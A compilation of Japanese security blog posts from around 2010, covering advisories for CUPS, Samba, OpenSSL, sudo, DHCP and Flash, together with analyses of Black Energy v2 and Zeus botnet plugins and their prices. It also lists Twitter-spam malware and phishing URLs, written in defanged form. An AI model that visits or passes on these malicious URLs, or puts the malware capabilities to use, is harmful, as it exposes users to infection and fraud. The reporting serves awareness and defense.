http://www.virustotal.com/pt/analisis/0c703361a2a9a02e8d604a2750d61759939a870e270efa7cc20c9db0eecffd7b-1272529981

http://www.virustotal.com/analisis/494ce03e9d50929385fd870f63c50600364aa0e42f6026f2d0cb41267568bf97-1272805058

---

株式会社ケイエルジェイテック
http://www.kljtech.com
ウイルスモニターセンター

「HTTPS Everywhere」セキュアブラウザーのextention

2010年6月18日にEFF(Electronic Frontier Foundation)より「HTTPS Everywhere」のブラウザextentionがリリースされました。「HTTPS Everywhere」はブラウザの追加エクステンションであり、「pre-setting」されたサイトのHTTPリクエアストがHTTPSに変更しサイトに繋ぎます。現時点の「pre-setting」されたサイトは「Google Search、Wikipedia、Twitter、Facebook、The New York Times、The Washington Post、Paypal、EFF、Tor、Ixquick、など」。

もしFirefoxブラウザーが上記のサイトにhttpsで繋ぐと(1)アドレスバーの色が変わって、(2)右下にロックのアイコンが出てました。この(1)と(2)が無かったら見た目はhttpsで繋がっているけど完全にセキュアでは無いという可能性があります。

「pre-setting」されたサイトの設定ファイルはルールセットのファイルで設定が出来ます。形的にはXMLファイルです、例えば下記となります↓

＜ruleset name="Twitter"＞
＜rule from="^http://twitter\.com" to="https://twitter.com"/＞
＜rule from="^http://www\.twitter\.com" to="https://twitter.com"/＞
＜/ruleset＞
※ルールセットの詳細説明はこちら

「HTTPS Everywhere」のGUIコンセプトは使いやすい、シンプルで作られました、目的は一般ユーザが簡単に使える為のです。httpからhttpsの変更した時にそのままでセッションが繋ぎますのでユーザには迷惑がかかりません。逆にhttpsからhttpにセッションを戻せます。

「HTTPS Everywhere」のリリースについてニュースのリファレンスは下記となります↓
http://blogs.forbes.com/firewall/2010/06/18/https-everywhere-encrypts-your-connection-with-major-websites/
http://news.cnet.com/8301-27080_3-20008217-245.html
http://www.theregister.co.uk/2010/06/18/https_everywhere_firefox_plugin/

コメントはこちら↓

---

HTTPS Everywhereを使うだけではセキュアという保証は出来ませんが、SSL無いよりもあった方が増しです。セキュアになるかどうかとユーザの判断が必要ですので、先ずは「httpsを使うと何故かセキュアですか？」という説明からユーザに理解させないと…。

---

SNSのサイトは殆どhttpsに対応していますのでそのサイトに繋ぐとURLを手で書けばhttpsの繋ぐ事が出来ますよね、HTTPS Everywhereは結局同じ動きでしょ？

---

HTTPS Everywhereを使うと、pre-settingのサイトにHTTPSで繋げます。只のそれだけです、これで便利だと思いますよ。セキュアかどうかHTTPSの問題です、詰り…暗号キーの確認、相手のhttpsサイト動きの確認（httpやhttpsのリクエアストを投げるとどんな回答が来るかと分からないから）、セッションの繋ぐの確認、など

---

セキュリティ的にですが、(1)上手くアレンジしないとルールセットファイルは一つspoof攻撃窓口、(2)HTTPSセッションが割れた時にman-in-the-middle攻撃可能性も出ますね。

---

このサイトにHTTPSのセキュリティ弱い説明が書いてあります。これを読むとやっぱりセキュアの為に便利なHTTPSツールよりもHTTPSプロトコールの理解が重要だね…

---

---
http://0day.jp
セキュリティチーム

Apple Snow Leopardのアンチマルウェア

Apple社より、Snow Leopard OS X 10.6のバーションをリリース時点から「XProtect」マルウェア対策機能が追加されとります。「XProtect」マルウェア対策の仕組みは「LSQuarantine」機能を使っている下記のMacOSXアプリケーションでダウンロードされるデータがマルウェアをチェックします↓
# Safari
# Mail
# Firefox
# Thunderbird
# Entourage
# iChat

XProtect」のマルウェアパターンを更新されておりますXProtect.plistのXMLファイルの中に最新版マルウェアのパターン情報が入ってます。下記はXProtect.plistのスナップショット画像です↓


例えばApple Safariでマルウェアファイルをダウンロードされたら、ダウンロードを止める事が出来ますし、ユーザの判断も聞かれます。詰り、下記のイメージです↓

credit: macosx, cnet sec, sophos, kljtech
---
http://0day.jp
unixfreaxjp

Appleセキュリティリリース2010-004とMac OS X v10.6.4について

Apple社よりセキュリティアップデート2010-004とMac OS X v10.6.4がリリースされております。本件のリリースは色んなセキュリティ問題に対するパッチアップデート対応となります。本件の対応ついて色んなセキュリティリスクに当たって：DoSとリモートコード実行問題、権限セキュリティー問題、man-in-the-middle攻撃のリスクとXSS(Cross Script)セキュリティ問題の対応になります。

セキュリティアップデート2010-004の内容の中にFlashPlayerセキュリティ問題（APSB10-14）対応を含めてAdobe Flash Player plugin アップデートバーション10.0.45.2が入っています。

本件のセキュリティアップデートに当たって、MacOSユーザにはApple セキュリティArticle HT4188をご確認が必要です。最新Adobe Flash Playerのセキュリティ問題情報を明確に確認が必要です。
---
http://0day.jp
セキュリティチーム

Apple Webkitマルチプルセキュリティ問題

最近沢山AppleWebKitセキュリティ問題が発表されております。
WindowsOSのSafariブラウザユーザーに影響があり、まとめて下記のCVE IDでApple Webkit問題情報IDとなります。

CVE-2010-0544, CVE-2010-1119, CVE-2010-1387, CVE-2010-1390, CVE-2010-1392, CVE-2010-1393, CVE-2010-1395, CVE-2010-1396, CVE-2010-1397, CVE-2010-1398, CVE-2010-1399, CVE-2010-1400, CVE-2010-1401, CVE-2010-1402, CVE-2010-1403, CVE-2010-1404, CVE-2010-1405, CVE-2010-1408, CVE-2010-1409, CVE-2010-1410, CVE-2010-1412, CVE-2010-1414, CVE-2010-1415, CVE-2010-1416, CVE-2010-1417, CVE-2010-1418, CVE-2010-1419, CVE-2010-1421, CVE-2010-1422, CVE-2010-1749, CVE-2010-1758, CVE-2010-1759, CVE-2010-1761, CVE-2010-1763, CVE-2010-1769, CVE-2010-1770, CVE-2010-1771, CVE-2010-1774

上記のセキュリティ問題について下記のOSにも影響があります

Windows 7, Vista, XP SP2以下

本問題についてアップデートが出てますが下記のURLに確認ふぁ出来ます↓

http://support.apple.com/kb/HT4196
http://support.apple.com/kb/HT4220

---
http://0day.jp
セキュリティチーム/unixfreaxjp

【警告】SSH「auth keyboard-interactive」の認証攻撃

最近SSH「auth keyboard-interactive」の攻撃が増えてきました。
sshdのログでは下記のように見えます。


この攻撃に当たってssh_configの設定に下記の設定仕方が必要となります↓

PasswordAuthentication no
ChallengeResponseAuthentication no

色々調べたら全世界にも同じ情報を聞いてます、例え下記のリファレンス↓
http://isc.sans.edu/diary.html?storyid=9034&rss
---
http://0day.jp
unixfreaxjp

SNS通知マルウェアメール

現在上記に似たようなスパムメールが沢山発見されました。
内容はアカウントの関係偽通知メールで、HTMLファイルを添付されております。
上記の画像はTwitter管理からみたいなメールですので、Facebookと他のSNSからも沢山発見されました。
このメールに添付されたファイルの中にトロイマルウェアのコードがあり、添付ファイルを開かないで下さい。
マルウェアのコードは殆どjavascriptですが、ウイルス対策ソフトで全てブロックされてませんので、ユーザの判断も重要となります。
---
http://0day.jp
セキュリティチーム

モジュール仕組みマルウェア⇒「Black Energy v2」

前回私は「マルウェアのモジュール仕組み」というブログ内容を書きました、今回の内容は本物の「マルウェアのモジュール仕組み」のケースを説明させて頂きます。
Black Energy（バーション１）は有名なDDosトロイのマルウェアでした。2年間前にロシア対Georgiaのサイバーウォー事件で良く使われたDoS攻撃ツールでした。
今回Black Energy v2がつい最近が発見されて、このマルウェアは本格的なモジュール経由マルウェア仕組みです。
バーション２は1年間ぐらい開発されて、色々書き直されたそうです。このバーションにはrootkitとオリジナル認証機能が追加されて、Black Energy v2のトロイバイナリーの検知が難しくなるかと思います。
下記BE2の仕組み画像です↓

(credit:secureworks)

このマルウェアの目的は下記となります↓
1. DDoSトロイ（バーション１やバーション２）
2. 色々犯罪目的でリモートコントロールトロイ（バーション１やバーション２）
3. ログイン情報盗む（バーション２）

どんなモジュールに分散されているかとこれから説明します↓

Dropperぼ部分
上記の画像を説明します。BE2のはじめに動いてるコンポーネントはトロイDropperのです。Dropperはトロイのバイナリをダウンロードとアンパックし、OSシステムにrootkitをインストールしてしまいます。ダウンロードセッションの時に一番検知が出来る所です。アンパックとインストール分は色んなパターンのやり方を使われて検知しにくい状況です。オリジナル暗号仕組みもアンパックとインストールの時に発見されてます。rootkitのインストールについて、MS08-025セキュリティパッチが未だインストールされてないPCは一番リスクが高いです。


Rootkitの部分
rootkitをインストールされたら下記のBE2トロイ感染が始める↓
1. APIフック仕方を使いマルウェア存在をメモリーとOSプロセスの中に隠されます。
2. 特別のリクエストの為にだけ、APIフックのバイパス方法(hole)を作られます。目的はマルウェア機能のcallインターフェースになります。
3. Black Energyバーション２のDLLをユーザスペースsvchost.exeへインジェックされます。

rootkitのバイナリーを見たらrootkitのコマンドコードが分かるようになり　下記はBlack Energy v2のrootkitコマンドコードです↓


マルウェアDLLの部分
Black Energy v2はモジュールベース・マルウェアです。色んなマルウェア機能が分割されている状態です、BE2ですとそれぞれの機能は一つDLLファイルになります。
下記はBE2のDLL名前と機能説明↓
rexec - リモートにあるファイルをダウンロードと実行する
lexec - 「cmd.exe」コマンドを使いローカルファイルを実行する
die - BE2を直ぐにアンインストールする
upd - BE2をリモートアップデートする
setfreq – トロイのコミュニケーションポート情報を変更する
下記はすべてDLLに入っているFunction名前と説明となります↓


設定/conf方法
イニシャル設定はDLLの中にXMLで暗号されている状況です、decompressしたら下記の情報が見えます↓

↑ここに書いたのはトロイコントローラのURL/ウェブページに繋ぐと。
マルウェアのコードを見たらもっと沢山コマンドをイニシャルで用意が出来る、例え「ポート情報」、「トロイのユニークID」、など。

ネットワークやり取り
BE2のトロイ対ボットネットのコミュニケーションはHTTｐベースでやり取りしてます。下記はBE1とBE2のやり取り情報です↓

---
http://0day.jp
マルウェアアナライズ
アドリアン・ヘンドリック

【マルウェア情報】Zeus/ZbotボットネットのAddOn/Plugin追加モジュール

Zeus/Zbotボットネット仕組みを何回もこのブログに書きました。

短くしますとZeusボットネット/Zbotトロイの目的/動き方は下記のサマリーとなります↓
1. HTTPフォームに入力されたデータを取る事
2. Windows Protected Storageに保存された個人情報を取る事
3. クライアント側X.509認証情報(PKI)を取る事
4. FTP（ウェブサーバ管理）とPOP3(メール受信)アカウント情報を取る事
5. HTTPとFlashのcookie情報を削除や取る事
6. HTMLページの情報を変更する事、目的はアクセス情報を取る事
7. 感染されたユーザは感染されたHTMLページに転送する事
8. 感染されたユーザのHTMLフォーム情報のスクリーンショット画像と取る事
9. 感染されたパソコンからの情報整理する事
10. 感染されたPCのローカルホストファイル(%systemroot%\system32\drivers\etc\hosts)を変更する事
11. 感染されたPCにマルウェアファイルをダウンロードと実行する事
12. 自動起動の為感染されたPCのRegistryキー情報を変更する事

今回Zeus/Zbotのボットネット追加Addon/Pluginやモジュールを説明差し上げます。Zeusボットネットの追加モジュールは世の中にも結構売られております。Zeusボットネットの追加モジュールを入れたらZeusボットネットの機能は追加されてます。下記は有名なZeusボットネットモジュール情報です。この情報はセキュリティ理解の為にシェアしました。インターネットセキュリティ情報は皆さんの理解が重要と思い　セキュリティ情報を隠す必要はありませんと思っております↓

Zeus Kitバーション1.3.4.x以上 (価格は$3,000 ～ $4,000)
本件はプライベート版Zeusボットネットのモジュールです。このバーションは限定版みたいにZeusメーカと直接取引きとなります。プライベート版Zeusボットネットを使うと何台も使えるようになります（Zeusボットネットパッケージは一般のソフトと同じくHWライセンスIDが必要）

Backconnect (価格は～$1500)
backconnectモジュールを使うと感染されたマシンにボットネットから直接コマンドを実行する事が出来ます。目的は全てウェブで振り込み情報確認が出来ます。

「Firefox form grabber」 （価格は～$2000)
本モジュールを使うと全てFirefoxブラウザーのHTTPやり取りフォーム情報を取れます（PIIを含めて）。このモジュールはFirefoxバーション情報に合わせてずっとバーションアップされます。結構売れてますって聞いてます。

「(IM) chat notifier」（価格は～$500)
全てリアルタイムIM情報を取る事が出来ます。現在はJabberとTwitterの対応があります。このモジュールを使うと下記の情報が感染されたPCから取れます↓

Request Type :Domestic Wire
Name :John Smith
Address :1234 Main Street
City :Atlanta GA 12345
Payee Name :Some Bank
Memo :Credit to acc:1111111111
Beneficiary Account :Checking #0000001234
Beneficiary Address 1 :Georgia
Payee Bank ID :0123456
Bank Name :Some Bank
Addr1 :Atlanta Some Bank
Amount :1500000.00
From Account :My Money Market #123456789
Date Posted :01/01/10
Time Posted :2:00 PM

「VNCプライベートモジュール」（価格は～ $10,000）
このモジュールを使うと、上記のbackconnectモジュールと同じく、感染されたPCに直接繋ぐ事が出来ますが、違いのはVNCプロトコルでつなげます。

Windows7対応モジュール（価格は～$2000）
前回バーションのzbotトロイはWindows７に実行しますと基本的には難しいです。Windows7のセキュリティがしっかりしてます。Windows7で実行が出来るようにこのモジュールを売れてます。

Polimorphic/カメレオンZbotトロイのモジュール (金額情報が不明)
このモジュールを使うとZbotのトロイバイナリーSignature情報がころころ変わるようになります。このモジュールは最新出たばっかりで詳しい情報は未だ確認最中です。

下記はZeusのコントロールパネル画像↓

---
株式会社ケイエルジェイテック
http://www.kljtech.com
ウイルスモニターセンター

Mac OSXの2件CUPSウェブGUIの問題(CVE-2010-0540 & CVE-2010-1748)

本件セキュリティ問題について下記のOSとサービス情報に影響があります

Apple Mac OS X Server 10.6.3
Apple Mac OS X Server 10.6.2
Apple Mac OS X Server 10.6.1
Apple Mac OS X Server 10.5.8
Apple Mac OS X Server 10.5.7
Apple Mac OS X Server 10.5.6
Apple Mac OS X Server 10.5.5
Apple Mac OS X Server 10.5.4
Apple Mac OS X Server 10.5.3
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.6
Apple Mac OS X Server 10.5
Apple Mac OS X 10.6.3
Apple Mac OS X 10.6.2
Apple Mac OS X 10.6.1
Apple Mac OS X 10.5.8
Apple Mac OS X 10.5.7
Apple Mac OS X 10.5.6
Apple Mac OS X 10.5.5
Apple Mac OS X 10.5.4
Apple Mac OS X 10.5.3
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.6
Apple Mac OS X 10.5

問題の説明は下記となります

１）Apple Mac OS X CUPSウェブインターフェースXSRFセキュリティ問題(CVE-2010-0540 )

Class: Access Validation Error
CVE: CVE-2010-0540
Remote: Yes
Local: No
Published: Jun 15 2010 12:00AM
Updated: Jun 18 2010 08:19AM
Credit: Adrian 'pagvac' Pastor of GNUCITIZEN; Tim Starling

CUPSのウェブインターフェースのコードのバグがあり、XSFR（Cross Script Forgery Request）問題が出て、リモート側からマシンのAdmin権限を取る可能性が高い、本件の問題を使われたらリモート側からMacOSXのリモートセキュリティ攻撃が出来ます。攻撃が失敗した場合MacOSXでのDoS状態が出る可能性があります。

２）Apple Mac OS X CUPSウェブインターフェースのプライバシー漏れ問題(CVE-2010-1748)

Class: Unknown
CVE: CVE-2010-1748
Remote: Yes
Local: No
Published: Jun 15 2010 12:00AM
Updated: Jun 18 2010 08:19AM
Credit: Luca Carettoni

CUPSのウェブインターフェースのコードのバグがあり、リモート側からApple MacOSXのユーザとシステム情報を見れます。この情報を使われたら次のセキュリティ攻撃で使われる可能性が高いです。

再現仕方↓

本件セキュリティ問題の再現は上記の情報のままで再現が出来ます。

解決方法↓

セキュリティアップデートが出ましたが下記の情報となります
Apple Mac OS X Server 10.6
* Apple MacOSXServUpdCombo10.6.4.dmg
http://www.apple.com/support/downloads/

Apple Mac OS X 10.6
* Apple MacOSXUpdCombo10.6.4.dmg
http://www.apple.com/support/downloads/

リファレンス↓

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1748
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0540
http://www.securityfocus.com/bid/40889
http://www.securityfocus.com/bid/40897
http://www.apple.com/macosx/

---
http://0day.jp
セキュリティチーム

Sambaリモートメモリーcorruptionバグ(CVE-2010-2063)

本件セキュリティ問題について下記のUNIXデーモンに影響があります↓

Samba 3.0.x - 3.3.12 (inclusive)
OS: Ubuntu、Mandrake、Slackware、Trustix Secure、OpenPKG、SUSE、Turbolinux、 RedHat Enterprise Linux 、Debian

下記のデーモンに影響がありません

Sambaバーション3.3.13, 3.4.0 以上
※現在のSamba stableバーション3.5.3にも影響がありません

問題の説明は下記となります↓

SMB1パケットのハンドルのバグがあり、悪戯SMB1パケットリクエアストが来ますとsambaがBof(Buffer overflow)でクラッシュしてしまい、その時にサーバエクスプロイトが出てシステム権限の関係コマンドを実行される可能性が高いです。
本件のセキュリティバグがマルウェアに使われたらSambaサーバに色んなマルウェア感染攻撃仕組みを作ることが可能になりす。攻撃が失敗になった場合DoS状態が起きる可能性も高いです。

追加情報↓

CVE: CVE-2010-2063
Remote: Yes
Local: No
Published: Jun 16 2010 12:00AM
Updated: Jun 17 2010 06:39PM
Credit: Jun Mao of iDefense Labs

解決方法↓

本件セキュリティ問題に影響が無いSambaバーションにアップグレードが必要です。

リファレンス↓

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2063
http://www.samba.org/samba/security/CVE-2010-2063.html
http://www.securityfocus.com/bid/40884
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873
http://secunia.com/advisories/40145
http://www.vupen.com/english/advisories/2010/1486

---
http://0day.jp
セキュリティチーム

OpenSSH X11の「X11フォーワード」と「Plaintext recovery」バグについて

OpenSSHのX11フォーワードセッションハイジャック問題について
OpenSSHバーション5.1から影響になりません。その以外なバーションに影響があります。OpenSSHバーション5.1以下にアップグレードが必要です。リファレンスは下記となり↓

http://www.vupen.com/english/advisories/2008/2148
http://www.openssh.com/txt/release-5.1
http://www.securityfocus.com/bid/30339/

詳細な説明はリリースノートへご覧下さい。

OpenSSHの「Plaintext Recovery Attack」のセキュリティ問題について
OpenSSHバーション5.2から影響になりません。その以外なバーションに影響があります。OpenSSHバーション5.2以下にアップグレードが必要です。リファレンスは下記となり↓

http://www.cpni.gov.uk/Docs/Vulnerability_Advisory_SSH.txt
http://www.openssh.com/txt/cbc.adv
http://www.openssh.com/security.html

詳細な説明はリリースノートへご覧下さい。
---
http://0day.jp
セキュリティーチーム

OpenSSL 「EVP_PKEY_verify_recover()」のセキュリティバイパス問題(CVE-2010-1633)

本件セキュリティ問題について下記のソフトとOSに影響があります↓

OpenSSL 1.0.0
RedHat Fedora 13
RedHat Fedora 12

問題の説明は下記となります↓

OpenSSLのソースにバグがあり、セキュリティバイパス攻撃される可能性が高いです。原因は「 EVP_PKEY_verify_recover()」のデサインエラーです。「 EVP_PKEY_verify_recover()」のfunction自体はOpenSSLバーション1.0.0しか入ってません。再現仕方について標準SSLツールで再現が出来ます。

解決方法は下記となります↓

OpenSSL Project openssl-1.0.0a.tar.gz
http://www.openssl.org/source/openssl-1.0.0a.tar.gz

追加情報↓

Class: Unknown
CVE: CVE-2010-1633
Remote: Yes
Local: No
Published: Jun 01 2010 12:00AM
Updated: Jun 17 2010 07:19AM
Credit: Peter-Michael Hager

リファレンス↓

http://www.openssl.org/news/secadv_20100601.txt
http://www.securityfocus.com/bid/40503
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1633
http://secunia.com/advisories/40024
http://www.vupen.com/english/advisories/2010/1313

---
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

5月ウイルスサンプルスキャン結果について

shadowserverより5月のウイルスサンプルスキャン結果が頂き、このブログでシェア致します。下記の画像をクリックしたら詳細な情報を見れます。

↑ここに書いたデータの説明は下記となります↓
1. サンプルは5月の全世界から頂いたマルウェアサンプルです。
2. ウイルス・ソースのカテゴリーは「ウェブ」、「メール」と「エンドポイント」ユーザです。
3. スキャン仕方の段取りは2段階で自動仕組みになり、トライ１とトライ２となります。トライ１と２の間24時間の御待ち時間があります。
4．有名なアンチウイルスメーカ製品を使っていますが製品名をわざっと教えません。
※上記のデータは只の情報シェアであり、一つのリファレンスと思って下さい。
※詳細情報ページのエンコーディングは「iso-2022-jp」ですがブラウザー設定を合わせて下さいお願い致します。
※これからも毎月ちゃんとアップデートします。
---
株式会社ケイエルジェイテック
http://www.kljtech.com
ウイルスモニターセンター

dhcpサーバ「クライアントID長さゼロ」セキュリティ問題(CVE-2010-2156)

本件セキュリティ問題に付いて下記のソフトウェアとOSに影響があります↓

ISC DHCPサーバパッケージ、下記のバージョン
4.0.2P-1と4.1.1P-1以外
OS:UNIX/linux

問題内容は下記となります↓

find_length()ハンドルのバグがあり、クライアントのアイデンティティー(client identifier)情報が無い場合(zero length string)サービスが終了になってしまい(exitで終了、クラッシュではありません)、DoSセキュリティ問題になります。

再現仕方↓

説明されたようにそのままで再現が出来ます

解決方法↓

セキュリティパッチがリリースされました。最新版バージョン、4.0.2P-1と4.1.1P-1にアップグレードが必要です

リファレンスのアクセス情報は下記となります↓

http://www.isc.org/software/dhcp/advisories/cve-2010-2156

http://www.securityfocus.com/bid/40775

----
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

追加情報：Adobe Flash PlayerとAIRマルチプルセキュリティ問題

追加情報ですが、本日追加5件Adobe Flash PlayerとAIRマルチプルセキュリティ問題を発表されました。

詳細な説明は下記のリファレンスをご覧下さい、問題内容のサマリーはそれぞれのurlの下に書いてあります↓
----
http://www.securityfocus.com/bid/40805
「DefineBitのメモリーcorruption」

http://www.securityfocus.com/bid/40784
「ポインター作り方のバグ、DoSとリモートコード実行問題」

http://www.securityfocus.com/bid/40803
「バウンダリのバグ、マルチプルDoS関係のバグとリモートコード実行問題」

http://www.securityfocus.com/bid/40802
マルチプルBof(メモリーエラー)

http://www.securityfocus.com/bid/40801
「メモリーcorruptionエラー」
----
※もしマルウェアに上記セキュリティ問題情報が使われたらマルウェアに感染される可能性が高いです。
※セキュリティアップデートが出ました、セキュリティパッチ及び最新版のバージョンをインストールして下さい。

---
http://0day.jp/
セキュリティチーム

Adobe Flash PlayerとAIRマルチプルセキュリティ問題

本日5件Adobe Flash PlayerとAIRマルチプルセキュリティ問題を発表されました。

問題内容はメモリーcorruptionですが、詳細な説明は下記のリファレンスをご覧下さい↓

http://www.securityfocus.com/bid/40785

http://www.securityfocus.com/bid/40798

http://www.securityfocus.com/bid/40806

http://www.securityfocus.com/bid/40799

http://www.securityfocus.com/bid/40797

---
http://0day.jp/
セキュリティチーム

【警告】Adobeを狙ったエクスプロイト攻撃

Acrobatのauthplay.dllのバグにより、リモート側からローカルシステムに攻撃可能だというセキュリティ問題がCVE-2010-1297に登録され、メーカーはセキュリティパッチをリリースしました。

問題の再現方法がインターネットで交換されており、また、pdfファイルと共にマルウェアコードファイルがメールやWebページで沢山発見されています。パッチを未だインストールしてないユーザは注意が必要です。

攻撃の仕組みについてのビデオは下記です↓
http://www.youtube.com/watch?v=cIY0-3DyQvA&sns=em

問題が解決された最新バージョンのAdobe Reader、Flash Player、および各セキュリティパッチがリリースされていますので、早めにアップグレードして下さい。

リファレンス↓
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297
http://www.exploit-db.com/exploits/13787
http://www.adobe.com/support/security/advisories/apsa10-01.html
http://www.adobe.com/support/security/bulletins/apsb10-14.html
http://www.us-cert.gov/cas/techalerts/TA10-162A.html
http://www.securityfocus.com/bid/40586
http://www.securityfocus.com/bid/40759
http://www.osvdb.org/65141
http://secunia.com/advisories/40026
http://secunia.com/advisories/40034
---
http://0day.jp/
セキュリティチーム
アドリアンヘンドリック/渡部 章

IRCサーバパッケージのバックドア

「UnrealIRCサーバ」有名なチャットサーバのパッケージにバックドアコードが入ってしまいました。色んなソースを確認したら原因は管理者のFTP権限が取られ、ダウンロードページにあるオリジナルパッケージ(Unreal3.2.8.1.tar.gz )をマルウェアパッケージに交換されたようです。オリジナルコードがマルウェアコードに変更されております。
バックドアの動きは単純ですがある特別なIRCコマンドを実行したらシステムコマンドを実行する事が出来ます。
本問題は先週末に管理者が発見されて、オリジナルパッケージは8ヶ月前にリリースされました。確かにMD5情報はダウンロードページに何処でも書いて無かった。
マルウェアコードのsnapshotは下記の画像です(credit: costin raiu)

下記はリファレンス↓
http://www.unrealircd.com/
http://forums.unrealircd.com/viewtopic.php?t=6562
---
http://0day.jp
セキュリティチーム

「sudo」セキュリティ問題(CVE-2010-1646)

本件のセキュリティ問題について下記のUNIX OSソフトに影響があります↓

影響されたソフトとバーション情報は下記のURLに書いてあります↓
http://www.securityfocus.com/bid/40538

影響されてないソフト名とバーションは下記となります↓

Todd Miller Sudo 1.7.2 p7
Todd Miller Sudo 1.6.9 p23

問題の説明は下記となります↓

本件セキュリティ問題に影響されたsudoバーションはシステムenvironmentの情報をgetenv()コマンドで情報を取りますので、いくつかshell環境は別のenvironmentが持っていますがその時に正しいシステムのPATH情報を取れない可能性が出ます。もしこの状況をマルウェアに使われたらセキュリティ問題が出る可能性が高いです。

解決方法は↓

sudo 1.6.9p23 とsudo 1.7.2p7にアップグレードが必要です。

セキュリティ問題レジェンド↓

Class: Design Error
CVE: CVE-2010-1646
Remote: No
Local: Yes
Published: Jun 01 2010 12:00AM
Updated: Jun 01 2010 12:00AM
Credit: Evan Broder とAnders Kaseorg of Ksplice, Inc.

リファレンス↓

http://sudo.ws/sudo/alerts/secure_path.html
http://www.securityfocus.com/bid/40538/info
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1646
http://www.vuxml.org/freebsd/d42e5b66-6ea0-11df-9c8d-00e0815b8da8.html
http://secunia.com/advisories/40002

---
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

マルウェアJavaScriptについて（その２）

１）マルウェアサイトへ飛ばすjavascript

本件のjavascriptは一番沢山発見されたマルウェアjavascriptです、目的ははその他マルウェアサイトへ転送する事です。
仕組みは、例えば、下記のマルウェアに感染されたHTMLページの画像をご覧下さい↓

↑実はここに書いたのはアクセスが来たら「www212.americanexpress.com.dll.kz/mydata/form/apisrv.php」のURLへ転送しますと。本件のマルウェアjavascriptはアメリカンエクスプレス・クレジットカードの詐欺仕組みで結構使われているコードです。因みに上記のURLをクリックしてしまうとPHPの中にまた別のjavascriptが動いて、別のマルウェアページに飛ばされてしまいます。上記のサンプルにご注意して頂きたいのは「location.href」の単語です。

２）マルウェアをダウンロードさせるjavascript

このマルウェアjavascriptは一番見難いjavascriptです。例えば下記のサンプルですが↓

↑マークされた所はダウンローダーの部分です。実のドメイン名は書いてませんが「load.php」の中に書いてあります。
このスクリプトを実行するとload.phpにあるjavascriptを実行されて、ドメイン名＋「path」「マルウェアファイル.exe」ファイルをダウンロードしてしまう状況です。
上記形のjavascriptダウンローダーが多いです。上記の仕組みですと「GET」HTTPコマンドと「***.exe」ファイルを注意点になります。

つづく

最新Twitterスパム情報

Twitterスパムの件をモニターしました。
今月頭から今迄スパムのメッセージは殆ど下記のドメインのURLを使っています↓

googlegroups
110mb.com
t35.com

上記のドメインはただのRIDIRECTORであり、もしURLをクリックしてしまうと下記のマルウェアサイトへユーザが飛ばされてしまいます↓

ｈｔｔｐ://aomdesign101.com/d.htm
ｈｔｔｐ://aprendainglesrapido.net/x.htm
ｈｔｔｐ://capelcure.co.uk/1.html
ｈｔｔｐ://cobhamdogs.net/x.htm
ｈｔｔｐ://cobhamdogs.net/x.htm
ｈｔｔｐ://crefxxx.110mb.com/index.htm
ｈｔｔｐ://cresssa.110mb.com/index.htm
ｈｔｔｐ://dreaminom.t35.com
ｈｔｔｐ://faceseverywhere.com/x.htm
ｈｔｔｐ://givisss.110mb.com/index.htm
ｈｔｔｐ://grapevinephotography.com.au/1.htm
ｈｔｔｐ://groups.google.com/group/pppppps
ｈｔｔｐ://jennifervpearl.com/x.htm
ｈｔｔｐ://lessreachom.t35.com
ｈｔｔｐ://millcreekswim.com/x.htm
ｈｔｔｐ://openexe.googlegroups.com/web/Twitter_security_model_setup.zip
ｈｔｔｐ://pppppps.googlegroups.com/web/g.html
ｈｔｔｐ://superiormerchant.com/x.htm
ｈｔｔｐ://toldspeak.com
ｈｔｔｐ://twitter.com/account/not_my_account/
ｈｔｔｐ://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip
ｈｔｔｐ://uucgb.org/x.htm
ｈｔｔｐ://xizinnn.110mb.com/index.htm
ｈｔｔｐ://xyddds.110mb.com/index.htm

※↑ウェブプロキシ製品について上記のURLをブロック方法が必要です。

一番クリックしやすいTwitterスパムは下記の２つ内容となります↓

１）セキュリティ内容↓

Attention! We detected that someone was trying to steal your Twitter account password.
We strongly recomended you to download our secure module to protect account!
Please click on the link below:
ｈｔｔｐ://twitter.com/Twitter_security_model_setup.zip

２）読めないメッセージリマインダー内容↓

You have 1 unread message from Twitter
Please click on the link below or copy and paste the URL into your browser:
ｈｔｔｐ://twitter.com/account/=youremail@yourdomain.com

---
http://0day.jp
セキュリティチーム

pastebinサーバとkeylogger(キーロガー)マルウェアの関係

キーロガーとは、キーボードからの入力を監視して記録するソフト。もともとデバッグなどに利用するツールだったが、近年ではこっそり仕掛けてパスワードを盗むなど悪用される事例が増えている。

常駐型のソフトとして別のソフトの使用中に透過的に動作するようになっており、複数の人間が利用するパソコンにこっそり仕掛けてパスワードやクレジットカード番号などを収集するなど、悪用されることが多い。実際、インターネットカフェに仕掛けられたキーロガープログラムにより、ネットバンキングのパスワードが盗まれ、知らないうちに口座から現金が引き出されるといった被害が発生している。

最近沢山キーロガーマルウェアから取られた情報はpastebin.caのサイトで発見されました。pastebin.ca(http://pastebin.ca/)若しくはpastebin.comの見た目はソース交換されているサイトですが、pastebinサーバの中に沢山facebookやtwitterおログイン情報とパスワードが発見されてます。簡単な再現仕方が直ぐにも出来ますので、下記の画像で書いたようにGoogleで検索したら沢山個人情報が出てしまいます↓


Malware Cityサイトより同じ不具合もレポートされています。下記の画像pastebin.comに見つけたキーロガー情報です。


何故かハッカー達はpastebinサーバを使われているのか？pastebinサーバに沢山テキストフォーマットのコードが保存されていますので、pastebinにキーロガー情報を保存されると直ぐにはばれないかとハッカーの目的と思われます。

今迄pastebinサーバを使われているキーロガー・マルウェアがありますか？
BitDefender社より回答はあります、「Trojan.Keylogger.PBin.A」のキーロガーはpastebinのAPIを使い お客様の個人情報がpastebinサーバにアップロードされてしまいます。

どんな種類キーロガーマルウェアが流行っていますか？
